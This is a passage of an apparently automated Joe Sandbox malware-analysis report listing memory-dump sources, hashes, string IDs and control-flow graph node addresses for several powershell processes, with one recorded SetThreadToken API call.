                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CB19474E002199FDB55DFA9D590A9EFBF2FF88300F108669E819AB345DB30A9458F90
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                                                                                      • Opcode ID: 4f96dbf0443c48aeead8205a9a27c412e44e891746eee89e0251535af3f6851b
                                                                                                                                                                                                                      • Instruction ID: 50eaaa96198e92c0c8f7fd56e65584f51770237d51ac22c2d761429a08739fc1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f96dbf0443c48aeead8205a9a27c412e44e891746eee89e0251535af3f6851b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14213532B203059BEBB4596A9801B37BBD69BC0715F64883AE50A8B385DE75D841C3A1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                                                                                      • Opcode ID: a484f4e296f94336a7a84656f5830c611ee2036c71a7e21343b57ca001e7b61e
                                                                                                                                                                                                                      • Instruction ID: 28b37fbf2fd66310fade33e4c19b0fee009ba9fe0edfb2136f21a0c0822696fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a484f4e296f94336a7a84656f5830c611ee2036c71a7e21343b57ca001e7b61e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9101F250F4E3965FD76B123808285262FF21FC2A4071945DBC481CF29BCD148D4983E3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.2187716592.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a8a56a19517ba462c15bbdff1492119cc07ca22e903bd39434c5bf29450dda26
                                                                                                                                                                                                                      • Instruction ID: 04b93413ae0223871afa322a286f838e75db240209ffeff078b7ee374f425087
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8a56a19517ba462c15bbdff1492119cc07ca22e903bd39434c5bf29450dda26
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 020126711093549AE7208E29ECC4B67BFDDDF51325F08CA2AEC480BA82C678A841C7F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.2187716592.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bc1b5b5ee53bcbb3b7a8204b170e5376075f9c87ce1832054afd865301e9e935
                                                                                                                                                                                                                      • Instruction ID: d60cce75a2f8afe7c5e02d018dfa48da4d7b4ae7771f7b6eb22eab268d33695b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc1b5b5ee53bcbb3b7a8204b170e5376075f9c87ce1832054afd865301e9e935
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C001B57200E3C09EE7128B258C94B56BFB8DF52224F09C1DBD9888F2D3C2695844C7B1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.2188518562.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_4b50000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 99ec45de66e14ba766e1b616d0162d695dd1b764170b9f1dcbe259821d19a29c
                                                                                                                                                                                                                      • Instruction ID: 603edb4bd1b3644102e4688276fe64ed5348a9984f25bc095d3ad6f3f5c73afb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99ec45de66e14ba766e1b616d0162d695dd1b764170b9f1dcbe259821d19a29c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248199E555A72A1C736EC52CB50

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:6.6%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                      execution_graph 22923 8d17860 22924 8d178a3 SetThreadToken 22923->22924 22925 8d178d1 22924->22925

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 371 339b490-339b4a9 372 339b4ab 371->372 373 339b4ae-339b7f5 call 339acbc 371->373 372->373
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: {Yxo^$Yxo^
                                                                                                                                                                                                                      • API String ID: 0-3563231153
                                                                                                                                                                                                                      • Opcode ID: a486cc735c6cb2cd5a9462019858ba4243ea29fd2a6756008a5f7b79b941d1ea
                                                                                                                                                                                                                      • Instruction ID: 50cbb55e1d316d7e11b26835cf3e988358adf64b62d592e5610970554e36939c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a486cc735c6cb2cd5a9462019858ba4243ea29fd2a6756008a5f7b79b941d1ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D919175B007199BDB19EFB4C4546AEB7E2EF84704B008A2DD10AAF344DF746D0A8BD6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$piTk$piTk$piTk$piTk$piTk$|,Vk
                                                                                                                                                                                                                      • API String ID: 0-1171896915
                                                                                                                                                                                                                      • Opcode ID: 0cf008ca9434e0e723995abe9137dc543a4d014758ad355b7271fc97ab75f419
                                                                                                                                                                                                                      • Instruction ID: d88ec6c0c6c28f593644a46dc664f68d4ed7076d67a3208519a71f9496cb6a62
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cf008ca9434e0e723995abe9137dc543a4d014758ad355b7271fc97ab75f419
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F72227F1B012268FEB249B6885017FA7BE1FF89311F0584FAD909CB251DB31D846D7A2

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 201 7b23ce8-7b23d0d 202 7b23d13-7b23d18 201->202 203 7b23f00-7b23f4a 201->203 204 7b23d30-7b23d34 202->204 205 7b23d1a-7b23d20 202->205 211 7b23f50-7b23f55 203->211 212 7b240ce-7b24112 203->212 209 7b23eb0-7b23eba 204->209 210 7b23d3a-7b23d3c 204->210 207 7b23d22 205->207 208 7b23d24-7b23d2e 205->208 207->204 208->204 213 7b23ec8-7b23ece 209->213 214 7b23ebc-7b23ec5 209->214 215 7b23d3e-7b23d4a 210->215 216 7b23d4c 210->216 217 7b23f57-7b23f5d 211->217 218 7b23f6d-7b23f71 211->218 242 7b24228-7b2425d 212->242 243 7b24118-7b2411d 212->243 219 7b23ed0-7b23ed2 213->219 220 7b23ed4-7b23ee0 213->220 222 7b23d4e-7b23d50 215->222 216->222 223 7b23f61-7b23f6b 217->223 224 7b23f5f 217->224 227 7b24080-7b2408a 218->227 228 7b23f77-7b23f79 218->228 226 7b23ee2-7b23efd 219->226 220->226 222->209 229 7b23d56-7b23d75 222->229 223->218 224->218 231 7b24097-7b2409d 227->231 232 7b2408c-7b24094 227->232 233 7b23f7b-7b23f87 228->233 234 7b23f89 228->234 254 7b23d77-7b23d83 229->254 255 7b23d85 229->255 239 7b240a3-7b240af 231->239 240 7b2409f-7b240a1 231->240 238 7b23f8b-7b23f8d 233->238 234->238 238->227 244 7b23f93-7b23fb2 238->244 245 7b240b1-7b240cb 239->245 240->245 260 7b2428b-7b24295 242->260 261 7b2425f-7b24281 242->261 249 7b24135-7b24139 243->249 250 7b2411f-7b24125 243->250 277 7b23fc2 244->277 278 7b23fb4-7b23fc0 244->278 252 7b241da-7b241e4 249->252 253 7b2413f-7b24141 249->253 258 7b24127 250->258 259 7b24129-7b24133 250->259 262 7b241f1-7b241f7 252->262 263 7b241e6-7b241ee 252->263 264 7b24143-7b2414f 253->264 265 7b24151 253->265 266 7b23d87-7b23d89 254->266 255->266 258->249 259->249 274 7b24297-7b2429c 260->274 275 7b2429f-7b242a5 260->275 301 7b24283-7b24288 261->301 302 7b242d5-7b242fe 261->302 270 7b241f9-7b241fb 262->270 271 7b241fd-7b24209 262->271 269 7b24153-7b24155 264->269 265->269 266->209 272 7b23d8f-7b23d96 266->272 269->252 279 7b2415b-7b2415d 269->279 280 7b2420b-7b24225 270->280 271->280 272->203 281 7b23d9c-7b23da1 272->281 282 7b242a7-7b242a9 275->282 283 7b242ab-7b242b7 275->283 284 7b23fc4-7b23fc6 277->284 278->284 285 7b24177-7b2417e 279->285 286 7b2415f-7b24165 279->286 288 7b23da3-7b23da9 281->288 289 7b23db9-7b23dc8 281->289 290 7b242b9-7b242d2 282->290 283->290 284->227 294 7b23fcc-7b24003 284->294 295 7b24180-7b24186 285->295 296 7b24196-7b241d7 285->296 292 7b24167 286->292 293 7b24169-7b24175 286->293 297 7b23dab 288->297 298 7b23dad-7b23db7 288->298 289->209 308 7b23dce-7b23dec 289->308 292->285 293->285 324 7b24005-7b2400b 294->324 325 7b2401d-7b24024 294->325 303 7b2418a-7b24194 295->303 304 7b24188 295->304 297->289 298->289 320 7b24300-7b24326 302->320 321 7b2432d-7b2435c 302->321 303->296 304->296 308->209 323 7b23df2-7b23e17 308->323 320->321 332 7b24395-7b2439f 321->332 333 7b2435e-7b2437b 321->333 323->209 350 7b23e1d-7b23e24 323->350 330 7b2400f-7b2401b 324->330 331 7b2400d 324->331 326 7b24026-7b2402c 325->326 327 7b2403c-7b2407d 325->327 334 7b24030-7b2403a 326->334 335 7b2402e 326->335 330->325 331->325 339 7b243a1-7b243a5 332->339 340 7b243a8-7b243ae 332->340 347 7b243e5-7b243ea 333->347 348 7b2437d-7b2438f 333->348 334->327 335->327 344 7b243b0-7b243b2 340->344 345 7b243b4-7b243c0 340->345 349 7b243c2-7b243e2 344->349 345->349 347->348 348->332 352 7b23e26-7b23e41 350->352 353 7b23e6a-7b23e9d 350->353 359 7b23e43-7b23e49 352->359 360 7b23e5b-7b23e5f 352->360 366 7b23ea4-7b23ead 353->366 362 7b23e4b 359->362 363 7b23e4d-7b23e59 359->363 364 7b23e66-7b23e68 360->364 362->360 363->360 364->366
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                                                                                      • Opcode ID: d0b650088463a5f090af0ff7d6ab98856f68c1f46b062c204d602b3fd3b6fcbc
                                                                                                                                                                                                                      • Instruction ID: 3e6357796e303cebbc59b6058264012b2eb2b04f0db5a4aa2900e9e8d1835240
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0b650088463a5f090af0ff7d6ab98856f68c1f46b062c204d602b3fd3b6fcbc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B01269F17052619FDB249B68850077A7BE2EFC5311F1488AAD909CF741CB35DC86D7A2

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 435 8d17858-8d1789b 436 8d178a3-8d178cf SetThreadToken 435->436 437 8d178d1-8d178d7 436->437 438 8d178d8-8d178f5 436->438 437->438
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2183393980.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_8d10000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ThreadToken
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3254676861-0
                                                                                                                                                                                                                      • Opcode ID: e7f6baa5f4752c3c87c6cb1a497791b927b4a1c254d0a247aded37c7a334209a
                                                                                                                                                                                                                      • Instruction ID: 403aa44efb224fed51a1fe5e9acf5cc0287fef53254cdc95ed345c73478a3d7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7f6baa5f4752c3c87c6cb1a497791b927b4a1c254d0a247aded37c7a334209a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F91102B59006488FCB10DFAAD485ADEFFF4EF89324F24849AD459A7350C774A944CFA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 441 8d17860-8d178cf SetThreadToken 443 8d178d1-8d178d7 441->443 444 8d178d8-8d178f5 441->444 443->444
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2183393980.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_8d10000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ThreadToken
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3254676861-0
                                                                                                                                                                                                                      • Opcode ID: 3d35aff0da03cc99a8dec3773f0ae6d83416508150915b7d6f270981e96ece1a
                                                                                                                                                                                                                      • Instruction ID: 1120134d4cb76b8d9930dcd119b4426e3ad63e01091f85d36a6dd0d2255aff72
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d35aff0da03cc99a8dec3773f0ae6d83416508150915b7d6f270981e96ece1a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811F2B59007488FCB10DF9AD885B9EFBF8EF88324F24845AD519A7350C774A944CFA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 447 339e5b9-339e5ba 448 339e5bc-339e5c0 447->448 449 339e5c4-339e5cb 447->449 450 339e622-339e630 448->450 451 339e5c2 448->451 452 339e5cc-339e602 449->452 453 339e693-339e6b6 450->453 454 339e632 450->454 451->449 451->452 452->450 467 339e73a-339e753 453->467 468 339e6bc-339e6d3 453->468 455 339e63c 454->455 456 339e634-339e636 454->456 459 339e640-339e643 455->459 458 339e638-339e63a 456->458 456->459 458->455 461 339e644-339e689 458->461 459->461 461->453 473 339e75e 467->473 474 339e755 467->474 475 339e6db-339e738 468->475 476 339e75f 473->476 474->473 475->467 475->468 476->476
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: piTk
                                                                                                                                                                                                                      • API String ID: 0-164278191
                                                                                                                                                                                                                      • Opcode ID: 3ab857c99be20d6682ffd240b78a00bde274bd400424666fc7b99d602cec27e0
                                                                                                                                                                                                                      • Instruction ID: bb077ea01af8c69bc130cabed1c2db23d011c28d406e6fb457d81146d7102378
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ab857c99be20d6682ffd240b78a00bde274bd400424666fc7b99d602cec27e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41AB74E00205DFCB14EFB9D894A9DBBF2EF49305F1485AAE019AB395DB30AD05CB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 484 3396fe0-3396fff 485 3397105-3397143 484->485 486 3397005-3397008 484->486 513 339700a call 339767c 486->513 514 339700a call 3397697 486->514 488 3397010-3397022 490 339702e-3397043 488->490 491 3397024 488->491 496 3397049-3397059 490->496 497 33970ce-33970e7 490->497 491->490 498 339705b 496->498 499 3397065-3397073 call 339bf10 496->499 502 33970e9 497->502 503 33970f2 497->503 498->499 505 3397079-339707d 499->505 502->503 503->485 506 33970bd-33970c8 505->506 507 339707f-339708f 505->507 506->496 506->497 508 33970ab-33970b5 507->508 509 3397091-33970a9 507->509 508->506 509->506 513->488 514->488
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                                                                      • Opcode ID: 63ac3fd2089ef0ae7fe96a47b50b8ca2a25942121db36be2ae6543e1f78a533e
                                                                                                                                                                                                                      • Instruction ID: 630f319bf46db8c109c97740872beddf106decf3a5ea27fcc4d2b3b49642fb1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ac3fd2089ef0ae7fe96a47b50b8ca2a25942121db36be2ae6543e1f78a533e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E414B34A10205CFDB14DB69C8A8AAEBBF6EF8D315F195099D406AB391DA35DC01CB61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 515 339e610-339e612 516 339e61c-339e630 515->516 517 339e614-339e61a 515->517 519 339e693-339e6b6 516->519 520 339e632 516->520 517->516 530 339e73a-339e753 519->530 531 339e6bc-339e6d3 519->531 521 339e63c 520->521 522 339e634-339e636 520->522 524 339e640-339e643 521->524 523 339e638-339e63a 522->523 522->524 523->521 526 339e644-339e689 523->526 524->526 526->519 535 339e75e 530->535 536 339e755 530->536 537 339e6db-339e738 531->537 538 339e75f 535->538 536->535 537->530 537->531 538->538
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: piTk
                                                                                                                                                                                                                      • API String ID: 0-164278191
                                                                                                                                                                                                                      • Opcode ID: ddb0ee49354399098b5edb373097c8de7566161c388e16d66d98cc300e9b6789
                                                                                                                                                                                                                      • Instruction ID: 84910c165394596c6454c5f8d16f0668bab3038c641f379000faff9aceea2090
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddb0ee49354399098b5edb373097c8de7566161c388e16d66d98cc300e9b6789
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA41FF75A00205DFCB15DF79D89469EBBF6FF48305F04856AE419AB385DB30AC05CBA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 546 339e640-339e6b6 554 339e73a-339e753 546->554 555 339e6bc-339e6d3 546->555 558 339e75e 554->558 559 339e755 554->559 560 339e6db-339e738 555->560 561 339e75f 558->561 559->558 560->554 560->555 561->561
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: piTk
                                                                                                                                                                                                                      • API String ID: 0-164278191
                                                                                                                                                                                                                      • Opcode ID: 114d8d8b31e9c96b171756061c319b451b2bc523a8490925c87b3bc87249a2e2
                                                                                                                                                                                                                      • Instruction ID: d9c5c27f69a32dfa7ff8c6f1ecf3b45ab62be14cc970d3c93de80702c08820b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 114d8d8b31e9c96b171756061c319b451b2bc523a8490925c87b3bc87249a2e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13318E74A00215DFCB14EF69D994B9EBBF2FF88305F148529E419AB394DB30AC45CB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 569 339af98-339afa1 call 339a984 572 339afa6-339afaa 569->572 573 339afba-339afe2 572->573 574 339afac-339afb9 572->574 578 339afec-339b055 573->578 579 339afe4-339afeb 573->579 582 339b05e-339b07b 578->582 583 339b057-339b05d 578->583 579->578 583->582
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (&^q
                                                                                                                                                                                                                      • API String ID: 0-2067289071
                                                                                                                                                                                                                      • Opcode ID: 7f2d9cb1dc566628609e513e85b87621103b9b13ab93a4039fe6f084826f13e0
                                                                                                                                                                                                                      • Instruction ID: 945629a1c51e17349a078b9072839cd02b3915349f7198d427b356db6bd552c8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f2d9cb1dc566628609e513e85b87621103b9b13ab93a4039fe6f084826f13e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F21E075A042588FCB14DFAED844BAEFFF5EF88320F14846AD019E7340CB7598058BA5

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 657 33929f0-3392a1e 658 3392af5-3392b37 657->658 659 3392a24-3392a3a 657->659 664 3392b3d-3392b56 658->664 665 3392c51-3392c61 658->665 660 3392a3c 659->660 661 3392a3f-3392a52 659->661 660->661 661->658 666 3392a58-3392a65 661->666 669 3392b58 664->669 670 3392b5b-3392b69 664->670 667 3392a6a-3392a7c 666->667 668 3392a67 666->668 667->658 675 3392a7e-3392a88 667->675 668->667 669->670 670->665 674 3392b6f-3392b79 670->674 676 3392b7b-3392b7d 674->676 677 3392b87-3392b94 674->677 678 3392a8a-3392a8c 675->678 679 3392a96-3392aa6 675->679 676->677 677->665 680 3392b9a-3392baa 677->680 678->679 679->658 681 3392aa8-3392ab2 679->681 682 3392bac 680->682 683 3392baf-3392bbd 680->683 684 3392ac0-3392af4 681->684 685 3392ab3-3392ab6 681->685 682->683 683->665 688 3392bc3-3392bd3 683->688 685->684 690 3392bd8-3392be5 688->690 691 3392bd5 688->691 690->665 693 3392be7-3392bf7 690->693 691->690 694 3392bf9 693->694 695 3392bfc-3392c08 693->695 694->695 695->665 697 3392c0a-3392c24 695->697 698 3392c29 697->698 699 3392c26 697->699 700 3392c2e-3392c38 698->700 699->698 701 3392c3d-3392c50 700->701
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2d420143ca525af2affa4192c98241990f63e20d9c160b140c4e4bcc06075904
                                                                                                                                                                                                                      • Instruction ID: b19273fa303e64709a3873aac5c161a25f8a7c46914e1a717cfe589b3c43ba1d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d420143ca525af2affa4192c98241990f63e20d9c160b140c4e4bcc06075904
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B915A74A00649DFCB15CF58C8D49AAFBB1FF48310B28899AD815EB365C736EC51CBA0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 797 3397740-3397776 800 3397778-339777a 797->800 801 339777f-3397788 797->801 802 3397829-339782e 800->802 804 339778a-339778c 801->804 805 3397791-33977af 801->805 804->802 808 33977b1-33977b3 805->808 809 33977b5-33977b9 805->809 808->802 810 33977c8-33977cf 809->810 811 33977bb-33977c0 809->811 812 339782f-3397860 810->812 813 33977d1-33977fa 810->813 811->810 823 33978e2-33978e6 812->823 824 3397866-33978bd 812->824 816 3397808 813->816 817 33977fc-3397806 813->817 818 339780a-3397816 816->818 817->818 825 3397818-339781a 818->825 826 339781c-3397823 818->826 837 33978e9 call 3397938 823->837 838 33978e9 call 3397940 823->838 833 33978c9-33978d7 824->833 834 33978bf 824->834 825->802 826->802 828 33978ec-33978f1 833->823 836 33978d9-33978e1 833->836 834->833 837->828 838->828
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 47aee47638d58487eef6f2e2f881b9df162de66d74ecd18fc5069963fd167ca8
